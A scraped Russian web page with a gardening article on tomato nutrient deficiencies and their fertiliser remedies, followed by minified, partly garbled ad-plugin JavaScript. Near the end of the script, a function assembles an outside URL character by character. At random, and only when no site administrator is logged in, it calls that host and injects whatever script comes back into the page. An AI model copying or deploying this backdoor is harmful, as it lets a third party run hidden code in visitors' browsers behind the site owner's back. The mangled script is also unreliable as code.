Главным визуальным признаком отсутствия фосфора является то, что растения остаются низкорослыми и чахнут. Особенно это заметно в сравнении с другими растениями, которые получают достаточно фосфора и растут в тех же условиях. Часто томаты с недостатком фосфора путают с молодыми растениями, фаза роста которых еще впереди.

Признаки повреждения – бурые вкрапления на нижней поверхности листьев. Постепенно меняется окраска всего листа, он приобретает тусклый сине-серый блеск, прожилки становятся красно-фиолетовыми.

«Лечится» недостаток фосфора внесением одинарного или двойного суперфосфата, монофосфата аммония или монофосфата калия.

Нехватка калия

Калий довольно быстро и легко выносится из почвы, обгоняя другие элементы по скорости вымывания. При его недостатке в почве в нужном объеме растения более восприимчивы к болезням и вредителям, при этом выглядят слабыми и нездоровыми.

Дефицит калия выражается в появлении некроза краев листьев («обожженных» краев). По мере усиления нехватки калия область поражения расширяется, захватывая всю поверхность листа и все вегетативные органы растения. Некроз проникает в межжилковое пространство и попутно способствует развитию хлороза.

Молодые листья становятся мелкоморщинистыми, те, что постарше, – приобретают пепельно-серый оттенок, а со временем края превращаются в желтовато-зеленые сморщенные участки. Характерным для развития калиевой недостаточности является то, что ее развитие идет от краев к центру, придавая бронзово-бледный окрас всей поверхности.

Пораженные участки принимают ярко-оранжевый цвет, теряют прочность и ведут к появлению «недозрелых» плодов. Последнее обстоятельство ошибочно принимается огородниками за «бракованный» сорт или неправильный уход.

В отличие от хлороза, при дефиците азота аналогичное запущенное заболевание при недостатке калия практически необратимо. Правда, и развивается он преимущественно на молодых побегах.

Устраняется дефицит калия древесной или растительной золой в составе смеси: 0,5 л банки золы на 10 л ведро перепревшего компоста.

Дефицит кальция

При недостатке кальция некроз поражает в первую очередь основание листьев. Кальций обладает низкой подвижностью, поэтому его нехватка начинает проявляться размеренно и постепенно. Именно плохая транслокация в ряде случаев является основной причиной повреждения растения, а вовсе не недостаток кальция во внешней среде. Растения, испытывающие дефицит кальция, обладают большей склонностью к увяданию, чем не испытывающие проблем экземпляры.

Самый яркий признак, отлично заметный на созревших плодах, − это появление гнили темно-коричневого цвета (наподобие подпалины) на верхушке или у основания. Эта область темнеет и выравнивается, потом превращается в кожистую массу и, наконец, разрушается, открывая путь болезням и вредителям.

Что касается листьев, то верхние (более молодые) листья и стебель сохраняют привычный окрас, а вот нижние начинают желтеть.

Рекомендуются внекорневые подкормки кальциевой селитрой (20 г на 10 л воды).

Отсутствие магния

Межжилковый хлороз и следующий за ним некроз тканей – вот характерные признаки недостатка магния в томатах. При острой нехватке магния симптоматика становится похожей на нехватку калия.

Пораженные области формируются между жилками и представляют собой бурые и светлые пятна. Ткань межжилковых пластин начинает расширяться быстрее, чем неповрежденная, постепенно сморщиваясь и превращаясь в некротические участки. Обычно больше страдают нижние листья уже сформировавшихся растений. Они закручиваются книзу, становятся мягкими и ломкими. При этом прожилки довольно долго могут оставаться зелеными.

Справиться с напастью помогает опрыскивание листьев раствором нитрата магния (1 ч.л. на 10 л воды) или английской соли в той же пропорции.

Нехватка серы

Сера – довольно редкий элемент, однако, томаты нуждаются в нем постоянно. Когда концентрация серы снижается, прожилки и основание приобретают красноватый цвет.

Недостаток серы легко спутать с хлорозом, возникающим при азотном голодании. Правда, при серном дефиците пожелтение поверхности листа становится более однородным, охватывая, в том числе молодые листья. Опознать серное голодание можно по бледно-розовому, неяркому оттенку, который встречается на нижней стороне листьев и ближе к черешку.

В запущенной стадии некротические бляшки и коричневое поражение развиваются вдоль черешка, при этом листья вытягиваются вверх и становятся ломкими и хрупкими.

Ликвидировать дефицит способен сульфат магния (1 г на 1 л воды).

Дефицит марганца

Выявить отсутствие марганца у томатов довольно сложно. Внешне листья выглядят практически здоровыми и целыми. Межжилковый хлороз начинается на маленьких участках листьев и развивается в строго определенном объеме.

Первыми в зоне риска оказываются молодые листья. Легкий хлороз и усиление рисунка прожилок – вот и все, что можно диагностировать на начальном этапе и то в том случае, если посмотреть через лист на свет. По мере развития дефицита, листья приобретают серый металлический «блеск», а вдоль жилок формируются темные «конопушки» и некротические участки. На верхней поверхности листьев образуются багровые следы.

В этом случае растения опрыскивают 0,25% раствором сернокислого марганца или марганцово-кислого калия.

Отсутствие молибдена

Недостаток молибдена выражается в виде закручивания и пожелтения первой и второй пары листьев у основания. Молодые побеги сразу поражаются хлорозом и постепенно закручиваются.

На внешней поверхности со временем образуется нечто вроде пестрых кровянистых выделений, больше похожих на ржавчину. При этом внутренняя поверхность листьев не имеет симптомов поражения.

Строго говоря, катализатором нехватки молибдена может стать дефицит азота. Не всегда при восстановлении уровня азота в томатах происходит автоматическое повышение концентрации молибдена. Избыток молибдена вызывает блестящий оранжевый цвет листьев, что также не предвещает ничего хорошего.

Нехватка молибдена компенсируется раствором молибденовокислого аммония (1,5-2 г на 10 л воды).

Недостаток железа

Хлороз при потерях железа распространяется от стебля к листьям, в первую очередь поражая основания. Кажется, будто растение обрызгали из пульверизатора, направив его по центру. Железа обычно не хватает в известковых почвах, в которых не хватает кислорода или которые перенасыщены тяжелыми металлами.

Очевидный симптом железодефицита – начальная стадия хлороза молодых листьев, его постепенное распространение по поверхности и, наконец, полное обесцвечивание («выгорание») листа. На побелевших участках возникают некротические пятна. К счастью, это обратимый процесс и при восстановлении уровня железа к листьям возвращается привычный зеленый цвет. Первыми окрасятся прожилки – по изменению цвета станет ясно, что началось восстановление.

Это один из немногих случаев, когда правильное питание приводит к наблюдаемому извне положительному результату. Железо обладает низкой подвижностью, поэтому его дефицит наблюдается прежде всего на молодых листочках.

Недостаточное количество железа устраняется опрыскиванием 0,25% раствора сернокислого железа.

Дефицит бора

Бор – один из важных питательных элементов, который должен быть в «рационе» каждого растения, а томата в особенности. Для них одинаково плохо, когда бора в избытке (в этом случае он становится токсичным) и когда его не хватает.

Бор плохо транспортируется во флоэме, а признаки его дефицита более заметны у молодых растений на стадии размножения. На старых листьях межжилковый хлороз проявляется в виде пятен, меняющих цвет от желтого до оранжевого по мере усугубления дефицита. Листья и стебли становятся хрупкими и похожими по фактуре на пробку, а в верхней части плода образуется «ореол» из омертвевшей ткани.

Нехватка бора устраняется борной кислотой (5 г на 10 л воды).

Когда не хватает цинка…

На ранних стадиях дефицита цинка молодые листья желтеют, а на поверхности зрелых листьев появляется точечная коррозия. По мере обострения дефицита эти симптомы развиваются в сплошной междужилковый некроз. При этом основные прожилки остаются зелеными, что неверно может быть истолковано как восстановление дефицита железа.

При отсутствии цинка вносится сульфат цинка (2-4 г на 10 литров воды) или растения опрыскиваются 0,5% раствором сернокислого цинка.

…и меди

При нехватке меди листья начинают скручиваться наподобие свертков бумаги, а черешки сгибаются вниз. Медный дефицит проявляется в виде хлороза наряду со снижением тургора клеток. В недавно созревших листьях ярче видны зеленые прожилки, особенно на общем беловато-сером фоне. Отдельные листья покрываются обширными некротическими пятнами и загибаются книзу.

Компенсировать недостаток меди (особенно остро он ощущается на осушенных торфяниках и песчаных почвах) можно раствором медного купороса (1-2 г на 10 л воды) или сернокислой меди (20-25 г на 10 л воды).

Итак, дефицит азота, фосфора, цинка, калия и магния вначале проявляет себя на нижних, сформировавшихся листьях. Недостаток всех остальных микроэлементов заметен на молодых, верхних листьях и побегах. Помните, что минеральные удобрения можно заменить природными: компостом, настоем куриного помета, биогумусом, гуматом, яичной скорлупой и т.д.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};